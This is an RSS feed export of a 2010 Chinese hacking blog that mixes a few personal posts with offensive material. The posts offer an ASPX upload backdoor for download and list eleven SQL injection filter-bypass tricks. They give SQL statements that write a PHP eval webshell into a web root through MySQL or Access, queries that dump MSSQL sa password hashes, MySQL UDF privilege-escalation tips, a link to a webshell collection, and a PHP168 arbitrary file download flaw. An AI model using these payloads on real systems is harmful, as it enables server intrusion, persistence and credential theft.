<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>冰sugar&#039;s Blog</title>
	<atom:link href="http://sebug.cn/feed" rel="self" type="application/rss+xml" />
	<link>http://sebug.cn</link>
	<description>又一个 WordPress 博客</description>
	<lastBuildDate>Sat, 04 Sep 2010 05:26:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>搬宿舍了</title>
		<link>http://sebug.cn/archives/359</link>
		<comments>http://sebug.cn/archives/359#comments</comments>
		<pubDate>Sat, 04 Sep 2010 05:26:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[未分类]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=359</guid>
		<description><![CDATA[昨晚在学校住一晚，今天搬宿舍，HT宿舍，我来了，悲剧正式开始。]]></description>
			<content:encoded><![CDATA[<p>昨晚在学校住一晚，今天搬宿舍，HT宿舍，我来了，悲剧正式开始。</p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/359/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>aspx简单上传后门</title>
		<link>http://sebug.cn/archives/360</link>
		<comments>http://sebug.cn/archives/360#comments</comments>
		<pubDate>Wed, 01 Sep 2010 03:49:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[原创文章]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=360</guid>
		<description><![CDATA[介于某某某需要，就不说了。弄一个简单的aspx带参数后门上传， 如：sebug.aspx?goaction=login 功能简单，只有上传，仅供学习研究使用，不得做破坏！ 有两个版本，一个带cs文件，加aspx，(Default.aspx) 另一个则直接传upload.aspx 使用：上传文件到服务器，文件名为sebug.aspx 那么上传页面就是sebug.aspx?action=login 下载]]></description>
			<content:encoded><![CDATA[<p>介于某某某需要，就不说了。弄一个简单的aspx带参数后门上传，<br />
如：sebug.aspx?goaction=login<br />
<span id="more-360"></span><br />
功能简单，只有上传，仅供学习研究使用，不得做破坏！<br />
有两个版本，一个带cs文件，加aspx，(Default.aspx)<br />
               另一个则直接传upload.aspx<br />
使用：上传文件到服务器，文件名为sebug.aspx<br />
        那么上传页面就是sebug.aspx?action=login</p>
<p><a href='http://sebug.cn/wp-content/uploads/2010/09/loadfile.gz'>下载</a></p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/360/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>大舅一路走好&#8230;</title>
		<link>http://sebug.cn/archives/357</link>
		<comments>http://sebug.cn/archives/357#comments</comments>
		<pubDate>Wed, 25 Aug 2010 14:05:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[未分类]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=357</guid>
		<description><![CDATA[大舅，你就一路走好。]]></description>
			<content:encoded><![CDATA[<p>大舅，你就一路走好。</p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/357/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>防注入绕过必用11招</title>
		<link>http://sebug.cn/archives/354</link>
		<comments>http://sebug.cn/archives/354#comments</comments>
		<pubDate>Mon, 09 Aug 2010 14:35:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术杂谈]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=354</guid>
		<description><![CDATA[转载收藏！ 1、运用编码技术绕过 如URLEncode编码，ASCII编码绕过。 例如or 1=1即 %6f%72%20%31%3d%31 而Test也可以为 CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116) 2、通过空格绕过 如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如 or&#8221; swords&#8221; =‘swords&#8221;，由于mssql的松散性，我们可以把or &#8221;swords&#8221; 之间的空格去掉，并不影响运行。 3、运用字符串判断代替 用经典的or 1=1判断绕过, 如 or &#8221;swords&#8221; =&#8221;swords&#8221; 这个方法就是网上在讨论的。 4、通过类型转换修饰符N绕过 可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用， 如 or &#8221;swords&#8221; = N&#8221; swords&#8221; ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。 5、通过+号拆解字符串绕过 效果值得考证，但毕竟是一种方法。如 or &#8221;swords&#8221; =‘sw&#8221; +&#8221; &#8230; <a href="http://sebug.cn/archives/354">继续阅读 <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>转载收藏！<br />
<span id="more-354"></span><br />
1、运用编码技术绕过<br />
如URLEncode编码，ASCII编码绕过。</p>
<p>例如or 1=1即<br />
%6f%72%20%31%3d%31</p>
<p>而Test也可以为</p>
<p>CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)</p>
<p>2、通过空格绕过<br />
如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如<br />
or&#8221; swords&#8221; =‘swords&#8221;，由于mssql的松散性，我们可以把or &#8221;swords&#8221; 之间的空格去掉，并不影响运行。</p>
<p>3、运用字符串判断代替<br />
用经典的or 1=1判断绕过,<br />
如</p>
<p>or &#8221;swords&#8221; =&#8221;swords&#8221;</p>
<p>这个方法就是网上在讨论的。</p>
<p>4、通过类型转换修饰符N绕过<br />
可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，<br />
如</p>
<p>or &#8221;swords&#8221; = N&#8221; swords&#8221;</p>
<p>，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。</p>
<p>5、通过+号拆解字符串绕过<br />
效果值得考证，但毕竟是一种方法。如</p>
<p>or &#8221;swords&#8221; =‘sw&#8221; +&#8221; ords&#8221; ；EXEC(‘IN&#8221; +&#8221; SERT INTO &#8221;+&#8221; …..&#8221; )</p>
<p>6、通过LIKE绕过<br />
以前怎么就没想到呢？<br />
如</p>
<p>or&#8221;swords&#8221; LIKE &#8221;sw&#8221;</p>
<p>显然可以很轻松的绕过“=”“>”的限制……</p>
<p>7、通过IN绕过<br />
与上面的LIKE的思路差不多,<br />
如</p>
<p>or &#8221;swords&#8221; IN (&#8221;swords&#8221;)</p>
<p>8、通过BETWEEN绕过<br />
如</p>
<p>or &#8221;swords&#8221; BETWEEN &#8221;rw&#8221; AND &#8221;tw&#8221;</p>
<p>9、通过>或者<绕过</p>
<p>or ''swords'' > &#8221;sw&#8221;<br />
or &#8221;swords&#8221; < &#8221;tw&#8221;<br />
or 1<3<br />
……</p>
<p>10、运用注释语句绕过<br />
用/**/代替空格，如：UNION /**/ Select /**/user，pwd，from tbluser<br />
用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser</p>
<p>11、用HEX绕过，一般的IDS都无法检测出来</p>
<p>0x730079007300610064006D0069006E00 =hex(sysadmin)<br />
0x640062005F006F0077006E0065007200 =hex(db_owner)</p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/354/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>access导出webshell语句(iis6默认设置测试可行)</title>
		<link>http://sebug.cn/archives/342</link>
		<comments>http://sebug.cn/archives/342#comments</comments>
		<pubDate>Thu, 05 Aug 2010 15:16:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术杂谈]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=342</guid>
		<description><![CDATA[转载：814ckhum0r create table hack(test image); insert into hack (cmd) values ('┼硥捥瑵?敲畱獥?瘢污敵?┩>u'); Select cmd into [a] in 'h:\wwwroot\hack41.cn\wwwroot\bbs\database\x.asp;a.xls' 'excel 8.0;' from hack]]></description>
			<content:encoded><![CDATA[<p>转载：814ckhum0r<br />
<span id="more-342"></span></p>
<pre lang="sql">
create table hack(test image);
insert into hack (cmd) values ('┼硥捥瑵?敲畱獥?瘢污敵?┩>u');
Select cmd into [a] in 'h:\wwwroot\hack41.cn\wwwroot\bbs\database\x.asp;a.xls' 'excel 8.0;' from hack
</pre>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/342/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>搬家了&#8230;</title>
		<link>http://sebug.cn/archives/339</link>
		<comments>http://sebug.cn/archives/339#comments</comments>
		<pubDate>Thu, 29 Jul 2010 14:17:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[未分类]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=339</guid>
		<description><![CDATA[博客再次搬家了，原来放在斌斌那，香港的服务器，又再次搬回去了。 这些天博客放斌少呢，再此谢谢斌少！]]></description>
			<content:encoded><![CDATA[<p>博客再次搬家了，原来放在斌斌那，香港的服务器，又再次搬回去了。<br />
这些天博客放斌少呢，再此谢谢斌少！</p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/339/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MysqlDoor利器中的函数创建浅析</title>
		<link>http://sebug.cn/archives/323</link>
		<comments>http://sebug.cn/archives/323#comments</comments>
		<pubDate>Wed, 14 Jul 2010 07:28:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[原创文章]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=323</guid>
		<description><![CDATA[转载注明出处http://sebug.cn 许多时候，我们都会使用mysqldoor来留住我们的服务器权限，有时候也经常性的使用udf来进行提权，常常碰到这种情况，Can&#8217;t open shared library &#8216;mysqlDll_1278197415.dll&#8217; 。 这里使用的孤水饶城兄写的UDF提权工具。如图1。 先排除几种可能. 1、被服务器端的杀软KILL。 2、没写入文件。 3、由于脚本生成在system32目录下的文件名随机，导致程序没找到文件名。 1、我在本地进行测试，关闭了杀软，所以这种情况不存在，排除。 2、打开system32目录，生成出来的程序安安静静的躺在目录下。图2 1、做出第三种假设已经是排除前两种可能的情况下，既然怕程序是问题，那我们手动创建吧。（mysql5.0以上就不支持带绝对路径，所以生成在system32下）如图3 如图：4 去google了一番，网上还是没有最终的答案，只找到一个比较好的文章，那就是ninty写的那篇创建函数问题。可是琢磨一会还是没看懂。最后，看到无名在线，他常年在php环境下，对mysql比较了解。 跟他讨论以后，他给出问题的解决方法是把udf放在mysql中的data目录下。如图：5 他在他的机器上可以成功，我这就是通过不了。最后，用QQ协助，让他操作我的电脑，最后还是得不到解答，只能与好神奇来结束。 无奈下，到BK群求助，ninty说是路径问题，后来加了Q，远程以后，才得以解决。最后，总算明白他那篇文章，哈哈，这里不要怪我哈，我把资料做个整理。 提权之前，确定mysql权限，要是4.0版本直接用路径；要是5.0版本，放在system32目录下还不行，就放在data，要是在5.1版本下，操作会比较麻烦。 用 show variables like '%plugin%'; 只要把文件放在这个path下，就可以执行成功！但前提，你必须有mysql目录下目录创建权限。]]></description>
			<content:encoded><![CDATA[<p>转载注明出处http://sebug.cn<br />
<span id="more-323"></span><br />
许多时候，我们都会使用mysqldoor来留住我们的服务器权限，有时候也经常性的使用udf来进行提权，常常碰到这种情况，Can&#8217;t open shared library &#8216;mysqlDll_1278197415.dll&#8217; 。<br />
这里使用的孤水饶城兄写的UDF提权工具。如图1。<br />
<a href="http://sebug.cn/wp-content/uploads/2010/07/images1.png" rel="lightbox[323]"><img class="alignnone size-medium wp-image-325" title="images1" src="http://sebug.cn/wp-content/uploads/2010/07/images1-300x209.png" alt="" width="300" height="209" /></a></p>
<p>先排除几种可能.</p>
<p>1、被服务器端的杀软KILL。</p>
<p>2、没写入文件。</p>
<p>3、由于脚本生成在system32目录下的文件名随机，导致程序没找到文件名。</p>
<p>1、我在本地进行测试，关闭了杀软，所以这种情况不存在，排除。</p>
<p>2、打开system32目录，生成出来的程序安安静静的躺在目录下。图2</p>
<p><a href="http://sebug.cn/wp-content/uploads/2010/07/images2.bmp" rel="lightbox[323]"><img class="alignnone size-full wp-image-326" title="images2" src="http://sebug.cn/wp-content/uploads/2010/07/images2.bmp" alt="" /></a></p>
<p>1、做出第三种假设已经是排除前两种可能的情况下，既然怕程序是问题，那我们手动创建吧。（mysql5.0以上就不支持带绝对路径，所以生成在system32下）如图3</p>
<p><a href="http://sebug.cn/wp-content/uploads/2010/07/images3.bmp" rel="lightbox[323]"><img class="alignnone size-full wp-image-327" title="images3" src="http://sebug.cn/wp-content/uploads/2010/07/images3.bmp" alt="" /></a></p>
<p>如图：4</p>
<p>去google了一番，网上还是没有最终的答案，只找到一个比较好的文章，那就是ninty写的那篇创建函数问题。可是琢磨一会还是没看懂。最后，看到无名在线，他常年在php环境下，对mysql比较了解。</p>
<p>跟他讨论以后，他给出问题的解决方法是把udf放在mysql中的data目录下。如图：5</p>
<p><a href="http://sebug.cn/wp-content/uploads/2010/07/images3.jpg" rel="lightbox[323]"><img class="alignnone size-medium wp-image-328" title="images4" src="http://sebug.cn/wp-content/uploads/2010/07/images3-250x300.jpg" alt="" width="250" height="300" /></a></p>
<p>他在他的机器上可以成功，我这就是通过不了。最后，用QQ协助，让他操作我的电脑，最后还是得不到解答，只能与好神奇来结束。</p>
<p>无奈下，到BK群求助，ninty说是路径问题，后来加了Q，远程以后，才得以解决。最后，总算明白他那篇文章，哈哈，这里不要怪我哈，我把资料做个整理。</p>
<p>提权之前，确定mysql权限，要是4.0版本直接用路径；要是5.0版本，放在system32目录下还不行，就放在data，要是在5.1版本下，操作会比较麻烦。</p>
<p>用</p>
<pre>show variables like '%plugin%';</pre>
<p><a href="http://sebug.cn/wp-content/uploads/2010/07/images5.png" rel="lightbox[323]"><img class="alignnone size-medium wp-image-329" title="images5" src="http://sebug.cn/wp-content/uploads/2010/07/images5-300x232.png" alt="" width="300" height="232" /></a></p>
<p>只要把文件放在这个path下，就可以执行成功！但前提，你必须有mysql目录下目录创建权限。</p>
<p><a href="http://sebug.cn/wp-content/uploads/2010/07/images6.png" rel="lightbox[323]"><img class="alignnone size-medium wp-image-330" title="images6" src="http://sebug.cn/wp-content/uploads/2010/07/images6-300x102.png" alt="" width="300" height="102" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/323/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>几个小技巧</title>
		<link>http://sebug.cn/archives/316</link>
		<comments>http://sebug.cn/archives/316#comments</comments>
		<pubDate>Wed, 14 Jul 2010 07:10:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术杂谈]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=316</guid>
		<description><![CDATA[经常性的碰到一些小技巧的问题，做个记录。 ftp命令的妙用 ftp open www.baidu.com 60000 终端超出限制 mstsc /console /admin /v:sebug.cn:3389 内网渗透的小命令 for /f %%i in (serv.txt) do ping %%i -n 1 &#124; find "Pinging" >> res.txt 嗅探防掉线 echo off :3 ping www.XXXX.com if errorlevel 1 goto 1 if errorlevel &#8230; <a href="http://sebug.cn/archives/316">继续阅读 <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>经常性的碰到一些小技巧的问题，做个记录。</p>
<p><span id="more-316"></span><br />
ftp命令的妙用</p>
<pre lang="ftp">
ftp
open www.baidu.com 60000
</pre>
<p>终端超出限制</p>
<pre lang="lang">
mstsc /console /admin /v:sebug.cn:3389
</pre>
<p>内网渗透的小命令</p>
<pre lang="lang">
for /f %%i in (serv.txt) do ping %%i -n 1 | find "Pinging" >> res.txt
</pre>
<p>嗅探防掉线</p>
<pre lang="bat">
echo off
:3
ping www.XXXX.com
if errorlevel 1 goto 1
if errorlevel 0 goto 0
:0
goto 3:
:1
logoff
</pre>
<p>mysql导出shell</p>
<pre lang="php">
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
　　Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段
　　Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表
　　Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
　　Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
</pre>
<p>各种shell<br />
<a href="http://201.151.62.115:8080/shells/">http://201.151.62.115:8080/shells/</a></p>
<p>MS SQLSERVER  SA密码</p>
<pre lang="sql">
select name,password from master.dbo.sysxlogins where name='sa'
</pre>
<p>Mysql密码</p>
<pre lang="sql">
select file_priv from mysql.user where user='root';
</pre>
<p>cmd得终端端口</p>
<pre>
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
</pre>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/316/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP168 V6 下载任意文件漏洞</title>
		<link>http://sebug.cn/archives/223</link>
		<comments>http://sebug.cn/archives/223#comments</comments>
		<pubDate>Wed, 30 Jun 2010 01:11:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术杂谈]]></category>
		<category><![CDATA[PHP168 V6 下载任意文件漏洞]]></category>
		<category><![CDATA[下载任意文件漏洞]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=223</guid>
		<description><![CDATA[$url=base64_decode($url); $fileurl=str_replace($webdb[www_url],"",$url); if( eregi(".php$",$fileurl) &#38;&#38; is_file(PHP168_PATH."$fileurl") ){ die("ERR"); } if(!$webdb[DownLoad_readfile]){ $fileurl=strstr($url,"://")?$url:tempdir($fileurl); header("location:$fileurl"); exit; } 不玩了，找不到官方后台密码。无语死了。 最近考试，没得玩。。。简单写个exp，大家要的找我取。 或者去吐司下：http://www.t00ls.net/viewthread.php?tid=8890&#38;pid=114395&#38;page=3&#38;extra=#pid114395 多了爆路径的： 最近从官方找到的资料：]]></description>
			<content:encoded><![CDATA[<p><span id="more-223"></span></p>
<pre lang="php">
$url=base64_decode($url);
$fileurl=str_replace($webdb[www_url],"",$url);
if( eregi(".php$",$fileurl) &amp;&amp; is_file(PHP168_PATH."$fileurl") ){
die("ERR");
}

if(!$webdb[DownLoad_readfile]){
$fileurl=strstr($url,"://")?$url:tempdir($fileurl);
header("location:$fileurl");
exit;
}
</pre>
<p>不玩了，找不到官方后台密码。无语死了。<br />
最近考试，没得玩。。。简单写个exp，大家要的找我取。</p>
<p>或者去吐司下：<a href="http://www.t00ls.net/viewthread.php?tid=8890&amp;pid=114395&amp;page=3&amp;extra=#pid114395">http://www.t00ls.net/viewthread.php?tid=8890&amp;pid=114395&amp;page=3&amp;extra=#pid114395</a><br />
<a href="http://sebug.cn/wp-content/uploads/123123.jpg" rel="lightbox[223]"><img class="alignnone size-medium wp-image-226" title="123123" src="http://sebug.cn/wp-content/uploads/123123-300x111.jpg" alt="" width="300" height="111" /></a></p>
<p>多了爆路径的：</p>
<p><a href="http://sebug.cn/wp-content/uploads/php1680day.jpg" rel="lightbox[223]"><img class="alignnone size-medium wp-image-237" title="php1680day" src="http://sebug.cn/wp-content/uploads/php1680day-300x134.jpg" alt="" width="300" height="134" /></a></p>
<p>最近从官方找到的资料：</p>
<p><a href="http://sebug.cn/wp-content/uploads/qqq1.jpg" rel="lightbox[223]"><img class="alignnone size-medium wp-image-228" title="qqq" src="http://sebug.cn/wp-content/uploads/qqq1-300x212.jpg" alt="" width="300" height="212" /></a></p>
<p><a href="http://sebug.cn/wp-content/uploads/sss1.jpg" rel="lightbox[223]"><img class="alignnone size-medium wp-image-231" title="sss" src="http://sebug.cn/wp-content/uploads/sss1-300x175.jpg" alt="" width="300" height="175" /></a></p>
<p><a href="http://sebug.cn/wp-content/uploads/bbb.jpg" rel="lightbox[223]"><img class="alignnone size-medium wp-image-232" title="bbb" src="http://sebug.cn/wp-content/uploads/bbb-283x300.jpg" alt="" width="283" height="300" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/223/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>黑客攻击实战入门</title>
		<link>http://sebug.cn/archives/216</link>
		<comments>http://sebug.cn/archives/216#comments</comments>
		<pubDate>Tue, 29 Jun 2010 02:16:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[闲聊瞎扯]]></category>
		<category><![CDATA[黑客攻击实战入门]]></category>

		<guid isPermaLink="false">http://sebug.cn/?p=216</guid>
		<description><![CDATA[作者:BlAck.Eagle &#38; 冰sugar 冰sugar：希望给大家多多支持，也希望朋友多多宣传！ 简介： 本书是一本windows平台下渗透技术的入门书籍，作为一本计算机爱好者深入浅出的书籍，门槛低，所以称之为入门书籍。现在，作为渗透攻防入门书籍并不是很多，即便有了，书上内容所使用的工具也有所过时，本书牵涉到的漏洞以及工具实用性非常强。 为了给予读者朋友更好的知识盛宴，笔者尝试着囊括近几年来最流行的攻击手法。但是技术永远是进步的，很多东西还是需要读者自己去挖掘，但这本书足以概括了攻击层次的大体知识，也不乏很多新鲜技巧。读者朋友们无需掌握许多乏味的基础知识以及基本概念即可掌握该书的绝大部分内容，笔者会从实战的角度来对枯燥的理论知识释疑，引领大家走完这本书的征程。 ●涉及内容： 网络基础知识、信息收集、缓冲区溢出知识、拒绝服务、数据库攻防、 Web漏洞发掘、内网渗透、后门技术等 ●适合读者： 1、对渗透攻防技术感兴趣的朋友 2、网络爱好者 3、网管人员 4、想拓展安全知识的技术相关人员 ●序： 静谧夜空，星满苍穹，广袤大地被月光擦拭得那样清澈，散发着童话般的馨香。如此美的夜，充满着浪漫和陶醉，可在黑客技术旅者的眼中，却是那样朴素而平常。 萤火 学海无涯苦坐舟 草长莺飞的旷野，他们像是坠落草原的星辰，简约沉默，却在寒夜中闪烁着坚强的光。是萤火虫，抑或是我？同样的苦旅，相似的激情，狂热地燃烧自己的生命，点滴耗尽，为成就理想和真实之约而顽强殉道，断不言悔。 萤火虫，就是黑客的憧憬与痴愿之灵。 精灵 玉楼明月长相忆 用盛开的清秀染绿古道清泉，让似火的霓裳绽放山涧寂静。有时，会化作一抹嫣然的绿，为寒冬打开温暖的希望，抑或，曾经是一方淡雅红叶，飘进晚秋的深邃。激情时，似盛夏清风，拥柔裹香飞抵万里云天。忧伤处，是婉约古城，秀美惟存，却从此冷漠沉寂。 正因是如此幻美，黑客技术才若精灵般散发着致命的诱惑，为身后万千萤火苦苦追求。 书卷 千呼万唤始出来 万千承载，凝结一部书卷。也许它不是开启精灵少女心扉的钥匙，或许也不能令技术古城之旅温馨坦途，甚或，会让你从此就在兰菊落英中怅然悟道。然而，它在萤火虫瞬息的生命里，却为通向对技术执着的痴爱时空架起了一座伟岸的浮桥。 萤火书卷——技术与狂热的基线，让我们的精灵爱旅，从这里开始。 此致 苦夜共勉 [E.S.T]冰血封情 庚寅年正月三十黄昏题于洛辰小筑亦岚轩]]></description>
			<content:encoded><![CDATA[<p>作者:BlAck.Eagle &amp; 冰sugar</p>
<p>冰sugar：希望给大家多多支持，也希望朋友多多宣传！</p>
<p><span id="more-216"></span></p>
<p><a href="http://sebug.cn/wp-content/uploads/f97d8ceea98f9a555da9d418822d60b0.gif" rel="lightbox[216]"><img class="alignnone size-medium wp-image-217" title="f97d8ceea98f9a555da9d418822d60b0" src="http://sebug.cn/wp-content/uploads/f97d8ceea98f9a555da9d418822d60b0-213x300.gif" alt="" width="213" height="300" /></a></p>
<p>简介：</p>
<p>本书是一本windows平台下渗透技术的入门书籍，作为一本计算机爱好者深入浅出的书籍，门槛低，所以称之为入门书籍。现在，作为渗透攻防入门书籍并不是很多，即便有了，书上内容所使用的工具也有所过时，本书牵涉到的漏洞以及工具实用性非常强。</p>
<p>为了给予读者朋友更好的知识盛宴，笔者尝试着囊括近几年来最流行的攻击手法。但是技术永远是进步的，很多东西还是需要读者自己去挖掘，但这本书足以概括了攻击层次的大体知识，也不乏很多新鲜技巧。读者朋友们无需掌握许多乏味的基础知识以及基本概念即可掌握该书的绝大部分内容，笔者会从实战的角度来对枯燥的理论知识释疑，引领大家走完这本书的征程。</p>
<p>●涉及内容：<br />
网络基础知识、信息收集、缓冲区溢出知识、拒绝服务、数据库攻防、 Web漏洞发掘、内网渗透、后门技术等</p>
<p>●适合读者：<br />
1、对渗透攻防技术感兴趣的朋友<br />
2、网络爱好者<br />
3、网管人员<br />
4、想拓展安全知识的技术相关人员</p>
<p>●序：</p>
<p>静谧夜空，星满苍穹，广袤大地被月光擦拭得那样清澈，散发着童话般的馨香。如此美的夜，充满着浪漫和陶醉，可在黑客技术旅者的眼中，却是那样朴素而平常。</p>
<p>萤火 学海无涯苦坐舟</p>
<p>草长莺飞的旷野，他们像是坠落草原的星辰，简约沉默，却在寒夜中闪烁着坚强的光。是萤火虫，抑或是我？同样的苦旅，相似的激情，狂热地燃烧自己的生命，点滴耗尽，为成就理想和真实之约而顽强殉道，断不言悔。</p>
<p>萤火虫，就是黑客的憧憬与痴愿之灵。</p>
<p>精灵 玉楼明月长相忆</p>
<p>用盛开的清秀染绿古道清泉，让似火的霓裳绽放山涧寂静。有时，会化作一抹嫣然的绿，为寒冬打开温暖的希望，抑或，曾经是一方淡雅红叶，飘进晚秋的深邃。激情时，似盛夏清风，拥柔裹香飞抵万里云天。忧伤处，是婉约古城，秀美惟存，却从此冷漠沉寂。</p>
<p>正因是如此幻美，黑客技术才若精灵般散发着致命的诱惑，为身后万千萤火苦苦追求。</p>
<p>书卷 千呼万唤始出来</p>
<p>万千承载，凝结一部书卷。也许它不是开启精灵少女心扉的钥匙，或许也不能令技术古城之旅温馨坦途，甚或，会让你从此就在兰菊落英中怅然悟道。然而，它在萤火虫瞬息的生命里，却为通向对技术执着的痴爱时空架起了一座伟岸的浮桥。</p>
<p>萤火书卷——技术与狂热的基线，让我们的精灵爱旅，从这里开始。</p>
<p>此致</p>
<p>苦夜共勉</p>
<p>[E.S.T]冰血封情</p>
<p>庚寅年正月三十黄昏题于洛辰小筑亦岚轩</p>
]]></content:encoded>
			<wfw:commentRss>http://sebug.cn/archives/216/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>
